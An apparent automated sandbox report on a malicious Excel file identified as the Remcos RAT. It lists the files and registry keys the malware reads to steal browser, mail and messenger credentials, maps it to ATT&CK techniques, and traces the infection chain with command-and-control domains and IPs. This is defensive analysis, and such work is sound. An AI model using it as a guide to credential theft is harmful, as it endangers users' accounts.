                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,23_2_004082CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,30_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041739B GetVersionExW,21_2_0041739B
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data30_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db30_2_0040BB6B
                    Searches for Windows Mail specific files
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword23_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1432, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe30_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting                    		Valid Accounts11
                    Native API                    		121
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		13
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts23
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		21
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts223
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares21
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    DLL Side-Loading                    		3
                    Credentials In Files                    		4
                    File and Directory Discovery                    		Distributed Component Object Model211
                    Input Capture                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell                    		Network Logon Script322
                    Process Injection                    		1
                    Bypass User Account Control                    		LSA Secrets39
                    System Information Discovery                    		SSH4
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials3
                    Security Software Discovery                    		VNCGUI Input Capture213
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1529026 Sample: QPS-36477.xls Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 22 other signatures 2->112 13 EXCEL.EXE 59 33 2->13         started        process3 dnsIp4 102 192.3.220.40, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 13->102 104 wrath.me 188.114.96.3, 443, 49161, 49167 CLOUDFLARENETUS European Union 13->104 84 C:\Users\user\Desktop\QPS-36477.xls (copy), Composite 13->84 dropped 86 C:\Users\...\newthingtobeonlinefor[1].hta, HTML 13->86 dropped 166 Microsoft Office drops suspicious files 13->166 18 mshta.exe 10 13->18         started        22 mshta.exe 10 13->22         started        file5 signatures6 process7 dnsIp8 88 188.114.97.3, 443, 49163, 49169 CLOUDFLARENETUS European Union 18->88 90 wrath.me 18->90 114 Suspicious command line found 18->114 116 PowerShell case anomaly found 18->116 24 cmd.exe 18->24         started        92 wrath.me 22->92 27 cmd.exe 22->27         started        signatures9 process10 signatures11 138 Suspicious powershell command line found 24->138 140 Wscript starts Powershell (via cmd or directly) 24->140 142 PowerShell case anomaly found 24->142 29 powershell.exe 23 24->29         started        33 powershell.exe 27->33         started        process12 file13 78 C:\Users\...\verybestthingswesharedfornew.vbS, Unicode 29->78 dropped 80 C:\Users\user\AppData\...\uvrrkyhh.cmdline, Unicode 29->80 dropped 148 Suspicious powershell command line found 29->148 150 Obfuscated command line found 29->150 152 Installs new ROOT certificates 29->152 154 Suspicious execution chain found 29->154 35 wscript.exe 1 29->35         started        38 csc.exe 2 29->38         started        41 wscript.exe 33->41         started        43 csc.exe 33->43         started        signatures14 process15 file16 118 Suspicious powershell command line found 35->118 120 Wscript starts Powershell (via cmd or directly) 35->120 122 Bypasses PowerShell execution policy 35->122 124 2 other signatures 35->124 45 powershell.exe 4 35->45         started        74 C:\Users\user\AppData\Local\...\uvrrkyhh.dll, PE32 38->74 dropped 48 cvtres.exe 38->48         started        50 powershell.exe 41->50         started        76 C:\Users\user\AppData\Local\...\lkzgbmkm.dll, PE32 43->76 dropped 52 cvtres.exe 43->52         started        signatures17 process18 signatures19 144 Suspicious powershell command line found 45->144 146 Obfuscated command line found 45->146 54 powershell.exe 12 5 45->54         started        58 powershell.exe 50->58         started        process20 dnsIp21 94 ia600102.us.archive.org 207.241.227.242, 443, 49166, 49176 INTERNET-ARCHIVEUS United States 54->94 134 Writes to foreign memory regions 54->134 136 Injects a PE file into a foreign processes 54->136 60 RegAsm.exe 54->60         started        65 RegAsm.exe 58->65         started        signatures22 process23 dnsIp24 96 idabo.duckdns.org 60->96 98 idabo.duckdns.org 135.148.195.248, 49173, 49174, 6875 AVAYAUS United States 60->98 100 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands 60->100 82 C:\ProgramData\remcos\logs.dat, data 60->82 dropped 156 Contains functionality to bypass UAC (CMSTPLUA) 60->156 158 Detected Remcos RAT 60->158 160 Tries to steal Mail credentials (via file registry) 60->160 164 7 other signatures 60->164 67 RegAsm.exe 60->67         started        70 RegAsm.exe 60->70         started        72 RegAsm.exe 60->72         started        file25 162 Uses dynamic DNS services 96->162 signatures26 process27 signatures28 126 Tries to steal Instant Messenger accounts or passwords 67->126 128 Tries to steal Mail credentials (via file / registry access) 67->128 130 Searches for Windows Mail specific files 67->130 132 Tries to harvest and steal browser information (history, passwords, etc) 70->132

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    QPS-36477.xls18%ReversingLabsDocument-PDF.Trojan.Remcos
                    QPS-36477.xls100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
